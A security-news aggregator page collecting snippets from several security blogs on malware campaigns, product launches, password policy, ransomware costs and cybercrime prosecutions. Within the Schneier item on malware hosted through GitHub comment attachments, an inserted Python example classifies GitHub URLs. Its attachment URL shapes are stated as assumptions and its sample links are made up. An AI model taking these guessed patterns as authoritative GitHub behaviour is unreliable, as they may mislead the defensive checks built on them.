3 weeks, 1 day ago @ welivesecurity.com
eXotic Visit campaign: Tracing the footprints of Virtual Invaders

At that time, there were five apps available, using the names ChitChat.apk, LearnSindhi.apk, SafeChat.apk, wechat.apk, and wetalk.apk.

Dink Messenger on Google Play implemented emulator checks (just as Alpha Chat), whereas the one on the dedicated website did not.

Sim Info reached over 30 installs on Google Play; we have no information about when it was removed from the store.

The Specialist Hospital app, available on GitHub, poses as the app for Specialist Hospital in India (specialisthospital.in); see Figure 10.

However, the same GitHub account now hosts several new malicious apps available for download.

3 weeks, 2 days ago @ welivesecurity.com
Naked Security
latest post 7 months, 1 week ago
Update on Naked Security

Dear Naked Security readers,

Firstly, thank you for your interest, your time, and your contributions to the Naked Security community.

We have recently added the extensive catalog of Naked Security articles to the Sophos News blog platform, enabling us to provide all Sophos security research, insights, and intelligence in a single location.

We are redirecting articles from Naked Security to Sophos News and you can continue to access the Naked Security article library whenever you need it.

You can find their articles in the Security Operations, Threat Research and AI Research sections of this blog.

Whether you’re a threat hunter, security administrator, IT/security generalist, home user or mor…

7 months, 1 week ago @ news.sophos.com
Mom’s Meals issues “Notice of Data Event”: What to know and what to do

8 months, 1 week ago @ nakedsecurity.sophos.com
S3 Ep149: How many cryptographers does it take to change a light bulb?

8 months, 1 week ago @ nakedsecurity.sophos.com
Using WinRAR? Be sure to patch against these code execution bugs…

8 months, 2 weeks ago @ nakedsecurity.sophos.com
Smart light bulbs could give away your password secrets

Have you listened to our podcast?

8 months, 2 weeks ago @ nakedsecurity.sophos.com
“Snakes in airplane mode” – what if your phone says it’s offline but isn’t?

8 months, 2 weeks ago @ nakedsecurity.sophos.com
S3 Ep148: Remembering crypto heroes

Have you listened to our podcast?

8 months, 2 weeks ago @ nakedsecurity.sophos.com
FBI warns about scams that lure you in as a mobile beta-tester

Have you listened to our podcast?

8 months, 2 weeks ago @ nakedsecurity.sophos.com
“Grab hold and give it a wiggle” – ATM card skimming is still a thing

Have you listened to our podcast?

8 months, 3 weeks ago @ nakedsecurity.sophos.com
Crimeware server used by NetWalker ransomware seized and shut down

Have you listened to our podcast?

8 months, 3 weeks ago @ nakedsecurity.sophos.com
S3 Ep147: What if you type in your password during a meeting?

8 months, 3 weeks ago @ nakedsecurity.sophos.com
Microsoft Patch Tuesday: 74 CVEs plus 2 “Exploit Detected” advisories

Have you listened to our podcast?

8 months, 4 weeks ago @ nakedsecurity.sophos.com
Help Net Security
latest post 6 hours ago
Bug hunters can get up to $450,000 for an RCE in Google’s Android apps

Google has drastically increased the rewards bug hunters can get for reporting vulnerabilities in Android apps it develops and maintains.

Increased bug bounties

The Google Mobile Vulnerability Reward Program was launched in May 2023, and covers Android apps developed by Google and its subsidiaries (e.g., Fitbit, Waymo, Waze, etc.).

If user interaction (e.g., following a link) is required, the award amount is halved.

Bugs in Tier 2 and Tier 3 apps are covered by the program, but deliver smaller bounties.

Incentivizing ethical hackers to search for vulnerabilities in Android apps by Google

Blasiak says that these changes have been introduced after feedback from their top bug hunters.

6 hours ago @ helpnetsecurity.com
Trellix Wise automates security workflows with AI, streamlining threat detection and remediation

Trellix has unveiled Trellix Wise, a powerful suite of traditional and Generative Artificial Intelligence (GenAI) tools to drastically reduce cyber risk.

Trellix Wise extends across the Trellix XDR Platform to discover and neutralize threats more efficiently while lowering security operations costs.

With Trellix Wise, automatic alert investigation ensures alerts are quickly triaged, scoped, and assessed.

It delivers real-time operational threat intelligence leveraging 68 billion queries a day on malicious activity from more than 100 million endpoints.

Trellix Wise connects hundreds of security tools and can be implemented in on-premises and cloud environments.

8 hours ago @ helpnetsecurity.com
Microsoft, Google widen passkey support for its users

Since 2013, the first Thursday in May is marked as World Password Day, a day dedicated to raising awareness about the need for using strong, unique passwords to secure our digital lives.

New offerings and extended passkey support

Just in time for 2024 World Password Day, various companies have launched and/or announced new authentication-related offerings.

Microsoft has announced passkey support for consumer accounts and is adding support for device-bound passkeys in the Microsoft Authenticator mobile app.

After having launched passkey support for Google Accounts, Google Workspace and Google Cloud accounts last year, the tech behemoth says that they will soon support the use of passkeys to e…

9 hours ago @ helpnetsecurity.com
Cyble Vision X covers the entire breach lifecycle

Cyble is launching Cyble Vision X, the successor to its Cyble Vision 2.0 threat intelligence platform, to elevate the user experience by empowering decision-makers with immediate access to critical information.

Cyble Vision X users can be assured that the transition from Cyble Vision 2.0 will be handled seamlessly and executed in stages.

“The launch of Cyble Vision X will mark a significant achievement in our mission to provide cyber threat intelligence that enables businesses of all sizes to anticipate and respond to the constantly changing threat environment,” said Manish Chachada, COO of Cyble.

Cyble Vision X will still offer a wide range of capabilities, including incident response, sec…

9 hours ago @ helpnetsecurity.com
BlackBerry CylanceMDR improves cybersecurity defensive strategy

“CylanceMDR offers more than just industry-leading technology; you’re getting a true AI-driven MDR fueled by proprietary threat intelligence.

But we know it’s not enough to have the right technology.

The key is having the right team to back you up,” said Nathan Jenniges, SVP and GM at BlackBerry Cybersecurity.

CylanceMDR also offers an “On-Demand” solution tailored exclusively for customers with established security teams seeking in-depth investigation and response to threats.

In independent testing, Cylance AI threat detection acted up to 13 times faster, preventing 98% of attacks earlier in the kill chain.

9 hours ago @ helpnetsecurity.com
FortiGate 200G series boosts campus connectivity for Wi-Fi 7

Built on the Fortinet operating system, FortiOS, and the latest, fifth-generation Fortinet security processing unit (SP5), the FortiGate 200G series delivers increased firewall throughput, FortiGuard AI-Powered Security Services, and 5GE ports for the new Wi-Fi 7 wireless standard.

The performance and AI-powered features modern campuses need

The FortiGate 200G series was purpose-built to deliver high-performing networking and security capabilities required within the modern campus.

Key features include: NGFW security performance, including 7x greater firewall throughput, 16x greater IPsec VPN throughput, and 2x greater threat protection than the industry average.

10 hours ago @ helpnetsecurity.com
Nokod Security Platform secures low-code/no-code development environments and apps

Nokod Security launched the Nokod Security Platform, enabling organizations to protect against security threats, vulnerabilities, compliance issues, and misconfigurations introduced by LCNC applications and robotic process automations (RPAs).

To overcome this bottleneck, the Nokod Security Platform provides citizen developers clear step-by-step guidance for fixing security issues as well as automated remediation options that can be triggered with the click of a button.

“With Nokod, organizations gain the necessary visibility and control to ensure their digital transformation journey is secure and compliant at all times.”

Nokod Security Platform features and benefits

Using compliance, governan…

10 hours ago @ helpnetsecurity.com
Lenovo launches AI-based Cyber Resiliency as a Service

Lenovo has launched its new AI-based Cyber Resiliency as a Service (CRaaS) leveraging Lenovo device telemetry and the Microsoft security software portfolio including Microsoft Copilot for Security and Defender for Endpoint.

“Lenovo Cyber Resiliency as a Service helps give business leaders assurance of their entire estate via single-pane-of-glass visibility,” said Marc Wheelhouse, Chief Security Officer, Lenovo Solutions and Services Group.

“Lenovo CRaaS simplifies security procurement by offering a comprehensive solution that brings the full power of the Microsoft security stack and is fully managed by Lenovo,” added Wheelhouse.

Adopting a cyber resiliency managed service helps improve busin…

11 hours ago @ helpnetsecurity.com
Edgio ASM reduces risk from web application vulnerabilities

ASM, combined with Edgio’s comprehensive web security solutions and managed security services, provides an edge-enabled continuous web application threat management service.

Based on the findings from Verizon’s Data Breach Investigations Report (DBIR), over 60% of data breaches were attributed to web applications.

With Edgio ASM, organizations now have the capability to continuously track and inventory all external web assets, automatically detect potential vulnerabilities and security exposures, and provide a centralized interface for security teams to track and manage the remediation of all security issues.

In addition, Edgio provides holistic Web Application and API Protection (WAAP) to prot…

11 hours ago @ helpnetsecurity.com
Gurucul REVEAL empowers organizations with full control over data
Gurucul REVEAL empowers organizations with full control over data Gurucul REVEAL empowers organizations with full control over data

Gurucul announced REVEAL, a unified security analytics platform.

The intelligent data engine and unified data fabric provide full visibility by interpreting any data collected from any data source in any format, including structured and unstructured data.

Gurucul federated search allows analysts to run queries from a single console across any data source including data lakes, cloud object storage, databases, identity systems, threat intel sources, and SIEMs – including Splunk.

REVEAL empowers organizations with full control over data and significant cost s…

12 hours ago @ helpnetsecurity.com
Orum No Code Verify helps businesses validate bank accounts

Orum launched No Code Verify, which helps businesses and institutions determine whether a bank account is open and valid before initiating payments — all without integrating an API.

The new technology, launched in October 2023, makes it easy for businesses and banks to verify the status of any type of bank account.

Failed payments cost the global economy over $100B each year, a problem Verify solves by completing bank account verification within 15 seconds.

It enables non-technical support staff to upload files and validate bank accounts before issuing payments, helping fuel transformation and modernization.

Orum has built new technology that leverages the FedNow and RTP payment rails to pro…

13 hours ago @ helpnetsecurity.com
Ransom recovery costs reach $2.73 million

Average ransom payment has increased 500% in the last year, according to Sophos.

Organizations that paid the ransom reported an average payment of $2 million, up from $400,000 in 2023.

Excluding ransoms, the survey found the average cost of recovery reached $2.73 million, an increase of almost $1 million since the $1.82 million that Sophos reported in 2023.

The skyrocketing costs of ransomware attacks belie the fact that this is an equal opportunity crime.

The average ransom payment came in at 94% of the initial ransom demand.

15 hours ago @ helpnetsecurity.com
Most companies changed their cybersecurity strategy in the past year

Businesses worldwide have faced a rate of change in the threat environment evidenced by 95% of companies reporting cybersecurity strategy adjustments within just the past year, according to LogRhythm.

Continuing positive news, 79% of security professionals now rate their security defense as either good or excellent.

Even more concerning, 61% of security teams are still using manual and time-intensive approaches to share security status information.

Security teams need to be armed with enhanced case management metrics and advanced analytics to make informed decisions quickly.

The research examined several facets of cybersecurity, drawing on insights from a global survey of 1,176 security exe…

16 hours ago @ helpnetsecurity.com
What is cybersecurity mesh architecture (CSMA)?

Cybersecurity mesh architecture (CSMA) is a set of organizing principles used to create an effective security framework.

8 core capabilities of a well-designed CSMA
To understand how a cybersecurity mesh architecture incorporates its eight core capabilities, it’s essential to see it as a comprehensive approach that enhances an organization’s cybersecurity posture through a distributed and interconnected framework.

This is accomplished by integrating data from the mesh of detection systems along with structured data from threat intelligence feeds.

Behavioral and contextual data for transactions and requests also inform CSMA intelligence.

CSMA does not displace security information and event m…

16 hours ago @ helpnetsecurity.com
97% of security leaders have increased SaaS security budgets

58% of the organizations were affected by a SaaS security incident in the last 18 months, according to Valence Security’s 2024 State of SaaS Security Report.

Likely as a result, 96% of security leaders have made SaaS security a top priority and 97% have increased SaaS security budgets in 2024.

Top SaaS security challenges
The survey revealed the top security challenges the respondents are experiencing in securing their SaaS applications.

“While a staggering 96% of security leaders prioritize SaaS security, Valence’s report shows the complexity of SaaS security,” says Chris Steffen, VP of Research – Information Security at EMA.

“Security executives responded that their SaaS security challenges a…

17 hours ago @ helpnetsecurity.com
IT Security Guru
last post: 1 day, 9 hours ago
World Password Day 2024: Try Passkeys!

On this World Password Day, we should all pause and think about how we can adopt passkeys.

As a form of passwordless authentication, passkeys aim to eliminate the inherent risk factors of traditional credentials.

Why not go further than “thinking and reading about passkeys?” Try passkeys!

In the spirit of World Password Day, now let’s delve into better password hygiene and password management practices.

Plus, with a password manager, there is only one password you’ll have to remember: the one for your vault.

1 day, 9 hours ago @ itsecurityguru.org
World Password Day 2024: What are the experts saying?

It’s World Password Day 2024!

This includes educating them about common password mistakes, such as using easily guessable passwords or reusing passwords across multiple accounts.

Privileged access management software can help with privileged account and session management, secrets management and enterprise password management.

Do we send them their First Day Password in Plain Text over the airways, surely no one will intercept that?

In our recent 2024 Breached Password Report, we discovered that one of the most common breached passwords included the terms “New Hire”.

1 day, 9 hours ago @ itsecurityguru.org
Guest Blog: Securing K12 Schools with Centripetal and LANRover

K-12 schools are increasingly becoming targets for cyberattacks, highlighting the urgent need for robust cybersecurity measures.

Over the past few years, there has been a significant increase in cyberattacks targeting K-12 schools.

For example, in 2023 80% of K-12 schools fell victim to ransomware attacks.

K-12 schools face significant challenges in deploying cybersecurity technology due to budget constraints.

A solution has been developed by local company LANRover with cybersecurity company Centripetal to provide proactive real-time intelligence powered cybersecurity protection against all known threats for K-12 schools titled CleanINTERNET®.

3 days, 5 hours ago @ itsecurityguru.org
Synopsys Introduces Polaris Assist: AI-Powered Application Security Assistant

Synopsys has unveiled Polaris Assist, an innovative AI-powered application security assistant incorporated into the Synopsys Polaris Software Integrity Platform®.

Key Features of Polaris Assist
The inaugural release of Polaris Assist introduces two potent AI-driven functionalities within the Polaris Software Integrity Platform:

Polaris AI Issue Summaries
Polaris AI Issue Summaries facilitate developers’ understanding of, and response to, static analysis findings.

Polaris AI Fix Suggestions
Polaris AI Fix Suggestions streamline the process of addressing security vulnerabilities by presenting AI-generated code fixes.

“Polaris Assist boosts security and developer productivity, allowing them to more eas…

3 days, 7 hours ago @ itsecurityguru.org
Keeper Security Forges Cybersecurity Partnership With Williams Racing

Today, Keeper Security joins Williams Racing as an Official Partner on the eve of the F1 Miami Grand Prix.

Password management mitigates these risks, and Keeper will become Williams Racing’s Official Password Security Partner.

“Our data is one of our most important assets and protecting it is paramount,” said James Vowles, Team Principal, Williams Racing.

Keeper also embodies the ethos of the team: excellence, pioneering innovation and relentless determination to succeed.”
“Partnering with Williams Racing presents an exciting opportunity to showcase Keeper Security’s cutting-edge cybersecurity solutions on the global stage,” said Darren Guccione, CEO and Co-founder, Keeper Security.

Keeper S…

3 days, 7 hours ago @ itsecurityguru.org
UK to Take Steps in Helping Protect Consumers Against Cyber Threats from Smart Devices

Login credentials are a smart device’s first line of defence against hackers.

If the passwords for smart devices and connected accounts aren’t strong, it means there’s a greater risk of being hacked and misused for malicious purposes.

While most smart devices come with default passwords, some smart devices don’t require authentication at all, which presents a major security risk to the data being processed and the network it’s connected to.

“Oftentimes, smart devices come with additional features and services that might not be necessary.

“Given the mass use of smart devices as primary gateways to the internet, making sure they are secure is critical.

4 days, 4 hours ago @ itsecurityguru.org
APIContext’s Global Cloud API Performance Report Shows A Decline In Cloud API Availability

APIContext has unveiled its 2024 Cloud Service Provider API Report, offering an in-depth examination of the performance of leading cloud service providers in the essential API domain.

These interactions were sourced from a network of over 100 geographically dispersed cloud data centers, encompassing major public cloud service providers such as AWS, Azure, Google, and IBM.

Achieving 99.99% is the benchmark all API service providers should be aiming for, while 99.999% is the traditional telecommunications standard for service availability – equating to five minutes of downtime in a year.

Despite poorer overall service availability, other quality API metrics improved, and on balance, the API s…

1 week ago @ itsecurityguru.org
Cato Networks to Showcase New Security Evasion Tactics at RSA Conference 2024

Cato Networks, the SASE leader, today announced that Cato CTRL, the SASE leader’s cyber threat intelligence (CTI) research team, will demonstrate threat actors’ latest tactics designed to capitalise on organisations’ complex security architectures during presentations at the upcoming RSA Conference 2024.

Talks featuring Cato CTRL include:
“The Price is WRONG – An Analysis of Security Complexity” on May 6, 2024, at 10:50 a.m. PT.

With data from over 2,200 organisations, Maor will illuminate organisations’ blind spots and limited network visibility.

Maor will be joined by Tal Darsan, manager of managed cybersecurity services at Cato Networks, to reveal the current evasion techniques used by at…

1 week ago @ itsecurityguru.org
Salt Security Enhances API Security Platform with OAuth Protection Package

Salt Security has announced the release of its new multi-layered OAuth protection package to detect attempts to exploit OAuth and proactively fix vulnerabilities.

Salt is enhancing its API protection platform with a comprehensive suite of new OAuth threat detections and posture rules to address the growing challenge of OAuth exploitation.

Salt Security’s recent investigation exposed several critical security flaws within the OAuth implementations of popular ChatGPT plug-ins.

Salt Security’s OAuth Protection Package provides robust OAuth defences that help organisations achieve several critical security objectives.

In fact, within just five days of the OAuth protection package being deploye…

1 week, 1 day ago @ itsecurityguru.org
Female Tech Duo take Flight to Dubai to Launch the future of Cyber Leadership

Two formidable female tech leaders have joined forces to launch an innovative new leadership development and mentoring platform for the cyber community – Leading Cyber.

Leading Cyber was unveiled ahead of the duo visiting UK Cyber Week in London and the leadership development and mentoring platform concept will connect cyber security leaders around the world.

The innovative platform will build a global online community for cyber security leaders and cyber business owners to share, connect and grow.

Danielle is the Founder and Managing Director of Durham based Inside Out, an internal communications consultancy that has successfully penetrated the tech, HE and cyber security sectors building …

1 week, 1 day ago @ itsecurityguru.org
Interview: Cydea’s Risk Management Platform, Understanding Not Eliminating Risk

Last week, the IT Security Guru team attended Cydea’s Risk Management Platform launch in London.

Firstly, what is the new Cydea Risk Management platform?

And the financial quantification is the cherry on top: the ROI is immediately obvious!”
Cydea’s Risk Management Platform is built on the popular as-a-service model that is currently booming.

Building Cydea Risk Platform was no different.

Cydea Risk Platform helps organisations to have better conversations about cyber risk.

1 week, 1 day ago @ itsecurityguru.org
AI-driven cyber attacks to be the norm within a year, say security leaders

It finds that most businesses see “offensive AI” fast becoming a standard tool for cybercriminals, with 93% of security leaders expecting to face daily AI-driven attacks.

The research, Cyber security in the age of offensive AI, surveyed security leaders in the UK and US about their experience with AI as a tool in cybersecurity, enhancing both offensive and defensive capabilities.

It reveals that not only do most security leaders expect daily AI-driven attacks, two-thirds (65%) expect that offensive AI will be the norm for cybercriminals, used in most cyber attacks.

Only 11% of security leaders see bot attacks as the greatest cyber threat facing their business, below ransomware, phishing, an…

1 week, 1 day ago @ itsecurityguru.org
Coalition Finds More Than Half of Cyber Insurance Claims Originate in the Email Inbox

Coalition, the world’s first Active Insurance provider designed to prevent digital risk before it strikes, today published its 2024 Cyber Claims Report, which details emerging cyber trends and their impact on Coalition policyholders throughout 2023.

While these tools can help to reduce cyber risk, using some boundary devices can actually increase the likelihood of a cyber claim if they have known vulnerabilities.

Other key findings from the report include:
Overall claims frequency increased 13% year-over-year (YoY), and overall claims severity increased 10% YoY, resulting in an average loss of $100,000.

FTF (funds transfer fraud) frequency increased by 15% YoY, and severity increased by 24%, to an average loss of …

1 week, 1 day ago @ itsecurityguru.org
Expert Insight: ‘Minding the Gap’: How can we work to make cyber accessible for women?

According to the Department for Science, Innovation and Technology (DSIT), only 17% of the UK cyber sector workforce is female, and this is down from 22% in 2022.

As we know, the cyber sector is a male-dominated space, and therefore women aren’t necessarily presented with the same opportunities.

For instance, they might shy away from applying to a cybersecurity role unless they match every single piece of criteria.

Is there anything that can be used to incentivise women to work in the cyber sector?

Prominent female role models and leaders are crucial when it comes to making cyber more attractive for women.

1 week, 2 days ago @ itsecurityguru.org
KnowBe4 acquires UK’s Egress to create advanced AI-driven platform to manage human risk

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, today announced it has entered into a definitive agreement to acquire Egress, a leader in adaptive and integrated cloud email security.

Egress’ Intelligent Email Security suite provides a set of scaled, AI-enabled security tools with adaptive learning capabilities to help prevent, protect and defend organisations against sophisticated email cybersecurity threats.

By acquiring Egress, KnowBe4 plans to deliver a single platform that aggregates threat intelligence dynamically, offering AI-based email security and training that is automatically tailored relative to risk.

KnowBe4 recently an…

1 week, 2 days ago @ itsecurityguru.org
SecurityTrails
last post: none
Blogs 👨‍💻
Бизнес без опасности
last post: none
Жизнь 80 на 20
last post: 7 months, 2 weeks ago
ISO Survey 2022: ISO 27001 certificates (ISMS)

ISO Survey 2022: ISO 27001 certificates (ISMS) from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
ISO has published fresh statistics on issued certificates. I have updated my presentation on ISO 27001 (ISMS) certificates accordingly. A total of 71,549 ISO 27001 certificates were registered in 2022, 22% more than in 2021.

Top 10 countries by number of certificates:
1. China - 26301
2. Japan - 6987
3. United Kingdom of Great Britain and Northern Ireland - 6084
4. India - 2969
5. Italy - 2424
6. United States of America - 1980
7. Netherlands - 1741
8. Germany - 1582
9. Spain - 1561
10. Israel - 1467

For comparison, in Russia only 30 certificates were registered (remained) in 2022, versus 95 in 2021…

7 months, 2 weeks ago @ 80na20.blogspot.com
My first course on Udemy. Preparing for an ISMS certification audit

I have published my first course on Udemy, on preparing for an ISMS certification audit against ISO 27001: "ISO 27001:2022. How to prepare for a certification audit". In it I go through the tasks that need to be done before, during and after the certification audit. The course is in English.

7 months, 3 weeks ago @ 80na20.blogspot.com
Cybersecurity Frameworks

Cybersecurity Frameworks for DMZCON23 230905.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months ago @ 80na20.blogspot.com
Another presentation of mine about mind maps

My 15 Years of Experience in Using Mind Maps for Business and Personal Purposes from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months, 2 weeks ago @ 80na20.blogspot.com
NIST CSF 2.0, draft

From NIST CSF 1.1 to 2.0.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months, 2 weeks ago @ 80na20.blogspot.com
ZLONOV
last post: none
Блог Артема Агеева (Artem Ageev's blog)
last post: none
Киберпиздец
last post: 8 months, 1 week ago
Hi everyone. I disappeared, I confess, too much work :( Meanwhile I have brought you a 40% discount on all Linux Foundation courses and certifications. The discount is valid today only. If anyone has long been planning to take something serious on k8s, Linux or DevOps, now is the time…

Hi everyone. I disappeared, I confess, too much work :( Meanwhile I have brought you a 40% discount on all Linux Foundation courses and certifications. The discount is valid today only. If anyone has long been planning to take something serious on k8s, Linux or DevOps, now is the time. For example, the Certified Kubernetes Administrator (CKA) and Certified Kubernetes Security Specialist (CKS) bundle costs $435 instead of $725. The exam can be taken within a year of purchase > https://training.linuxfoundation.org/end-of-summer-2023/

8 months, 1 week ago @ t.me
Schneier on Security
last post: 2 hours ago
My TED Talks

About Bruce Schneier
I am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

2 hours ago @ schneier.com
Rare Interviews with Enigma Cryptanalyst Marian Rejewski

9 hours ago @ schneier.com
The UK Bans Default Passwords

The UK is the first country to ban default passwords on IoT devices.

On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

California banned default passwords in 2018, with the law taking effect in 2020.

IoT manufacturers aren’t making two devices, one for California and one for the rest of the US.

1 day, 9 hours ago @ schneier.com
AI Voice Scam

2 days, 9 hours ago @ schneier.com
WhatsApp in India

3 days, 9 hours ago @ schneier.com
Whale Song Code

During the Cold War, the US Navy tried to make a secret code out of whale song.

The basic plan was to develop coded messages from recordings of whales, dolphins, sea lions, and seals.

The message structure couldn’t just substitute the moaning of a whale or a crying seal for As and Bs or even whole words.

In addition, the sounds Navy technicians recorded between 1959 and 1965 all had natural background noise.

Repeated blasts of the same sounds with identical extra noise would stand out to even untrained sonar operators.

4 days, 9 hours ago @ schneier.com
Friday Squid Blogging: Searching for the Colossal Squid

6 days, 23 hours ago @ schneier.com
Long Article on GM Spying on Its Cars’ Drivers

1 week ago @ schneier.com
The Rise of Large-Language-Model Optimization

The advent of AI threatens to destroy the complex online ecosystem that allows writers, artists, and other creators to reach human audiences.

It quickly became apparent that the deluge of media made many of the functions that traditional publishers supplied even more necessary.

Technology companies developed automated models to take on this massive task of filtering content, ushering in the era of the algorithmic publisher.

Unlike human publishers, Google cannot read.

Protecting the web, and nourishing human creativity and knowledge production, is essential for both human and artificial minds.

1 week, 1 day ago @ schneier.com
Dan Solove on Privacy Regulation

The law can’t stop privacy consent from being a fairy tale, but the law can ensure that the story ends well.

In the European Union, the General Data Protection Regulation (GDPR) uses the express consent approach, where people must voluntarily and affirmatively consent.

Because it conceptualizes consent as mostly fictional, murky consent recognizes its lack of legitimacy.

To return to Hurd’s analogy, murky consent is consent without magic.

Murky consent should be subject to extensive regulatory oversight with an ever-present risk that it could be deemed invalid.

1 week, 2 days ago @ schneier.com
Microsoft and Security Incentives

Former senior White House cyber policy director A. J. Grotto talks about the economic incentives for companies to improve their security—in particular, Microsoft:
Grotto told us Microsoft had to be “dragged kicking and screaming” to provide logging capabilities to the government by default, and given the fact the mega-corp banked around $20 billion in revenue from security services last year, the concession was minimal at best.

[…]“The government needs to focus on encouraging and catalyzing competition,” Grotto said.

He believes it also needs to publicly scrutinize Microsoft and make sure everyone knows when it messes up.

“At the end of the day, Microsoft, any company, is going to respond mo…

1 week, 3 days ago @ schneier.com
Using Legitimate GitHub URLs for Malware

Interesting social-engineering attack vector:
McAfee released a report on a new Lua malware loader distributed through what appeared to be a legitimate Microsoft GitHub repository for the “C++ Library Manager for Windows, Linux, and MacOS,” known as vcpkg.

The attacker is exploiting a property of GitHub: comments to a particular repo can contain files, and those files will be associated with the project in the URL.

What this means is that someone can upload malware and “attach” it to a legitimate and trusted project.

For example, a threat actor could upload a malware executable in NVIDIA’s driver installer repo that pretends to be a new driver fixing i…
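The property described above is easy to check mechanically, and a download allowlist that trusts everything under `github.com/<trusted-org>/` is exactly what it defeats. The following is an added example, not code from the original post, from McAfee or from GitHub: it classifies github.com links by whether the bytes behind them are controlled by the repository's maintainers (release assets, blob, raw or archive paths) or by whoever posted a comment (an attachment, served under the repository's own path as `/<owner>/<repo>/files/<id>/<name>`, or under a site-wide `/user-attachments/` prefix). Both attachment URL shapes are assumptions drawn from publicly observed links rather than a documented GitHub contract, and the sample URLs, ids and filenames are constructed for the demonstration.

```python
"""Classify github.com download links by who controls the content behind them.

Added example, not from the original post, McAfee or GitHub. The URL shapes
are assumptions based on publicly observed links: a file attached to an
issue or PR comment was served as
  https://github.com/<owner>/<repo>/files/<numeric id>/<filename>
(a path that looks as if it belongs to <owner>/<repo>), and newer
attachments use https://github.com/user-attachments/{files,assets}/... .
"""
from urllib.parse import urlparse

# Verdicts. COMMENT_ATTACHMENT means "lives under a repository path but was
# uploaded by an arbitrary commenter": never trust it on the strength of the
# organisation name in the URL.
REPO_CONTENT = "repo-content"
COMMENT_ATTACHMENT = "comment-attachment"
UNKNOWN = "unknown"

# Path segments (right after /<owner>/<repo>/) that point at content the
# repository's maintainers actually control.
_REPO_CONTROLLED = {"releases", "blob", "raw", "archive", "tree"}


def classify_github_url(url: str) -> str:
    """Return REPO_CONTENT, COMMENT_ATTACHMENT or UNKNOWN for one URL."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    parts = [p for p in parsed.path.split("/") if p]

    if host == "raw.githubusercontent.com":
        # Assumption: raw.githubusercontent.com/<owner>/<repo>/<ref>/<path>
        # serves files from the repository tree only.
        return REPO_CONTENT if len(parts) >= 4 else UNKNOWN

    if host != "github.com":
        return UNKNOWN

    # Site-wide attachment prefix (assumed newer form): no repo in the path.
    if len(parts) >= 3 and parts[0] == "user-attachments" and parts[1] in ("files", "assets"):
        return COMMENT_ATTACHMENT

    if len(parts) < 3:
        return UNKNOWN

    # /<owner>/<repo>/files/<numeric id>/<filename>: a comment attachment
    # that merely borrows the repository's path.
    if parts[2] == "files" and len(parts) >= 5 and parts[3].isdigit():
        return COMMENT_ATTACHMENT

    if parts[2] in _REPO_CONTROLLED:
        return REPO_CONTENT

    return UNKNOWN


def untrusted_downloads(urls):
    """Filter a list of URLs down to the comment attachments."""
    return [u for u in urls if classify_github_url(u) == COMMENT_ATTACHMENT]


# Constructed sample links for the demonstration (ids and filenames are made up).
SAMPLE_URLS = [
    "https://github.com/microsoft/vcpkg/releases/download/2024.01.12/vcpkg-tool.zip",
    "https://github.com/microsoft/vcpkg/files/14000000/Cheat.Lab.zip",
    "https://github.com/user-attachments/files/14000001/installer.zip",
    "https://raw.githubusercontent.com/microsoft/vcpkg/master/README.md",
    "https://github.com/microsoft/vcpkg/blob/master/README.md",
    "https://github.com/microsoft/vcpkg",
]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{classify_github_url(u):18s} {u}")
    print("flag for review:", untrusted_downloads(SAMPLE_URLS))
```

The practical point is in the second sample: a proxy or download-policy rule keyed on the hostname plus the `microsoft/vcpkg` prefix lets it through, while the classifier flags it because the decision has to be made on the path segment after the repository name, not on the organisation. Unknown shapes are reported as such rather than silently trusted.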

1 week, 4 days ago @ schneier.com
Friday Squid Blogging: Squid Trackers

1 week, 6 days ago @ schneier.com
Other Attempts to Take Over Open Source Projects

Surprising no one, the incident is not unique:
The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails.

These emails implored OpenJS to take action to update one of its popular JavaScript projects to “address any critical vulnerabilities,” yet cited no specifics.

The email author(s) wanted OpenJS to designate them as a new maintainer of the project despite having little prior involvement.

This approach bears strong resemblance to the manner in which “Jia Tan” positioned themselves in the XZ/liblzma backdoor.

[…] The OpenJS team also recognized a similar suspicious pattern in two …

2 weeks, 1 day ago @ schneier.com
Using AI-Generated Legislative Amendments as a Delaying Technique


2 weeks, 2 days ago @ schneier.com
Krebs On Security
last post 3 days, 7 hours ago
Man Who Mass-Extorted Psychotherapy Patients Gets Six Years

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours.

When Vastaamo declined to pay, ransom_man shifted to extorting individual patients.

KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to p…

3 days, 7 hours ago @ krebsonsecurity.com
FCC Fines Major U.S. Wireless Carriers for Selling Customer Location Data

In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities.

The carriers promised to “wind down” location data sharing agreements with third-party companies.

The fine amounts vary because they were calculated based in part on each day that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements).

The FCC notes that AT&T and Verizon took more…

3 days, 23 hours ago @ krebsonsecurity.com
Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia.

In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data.

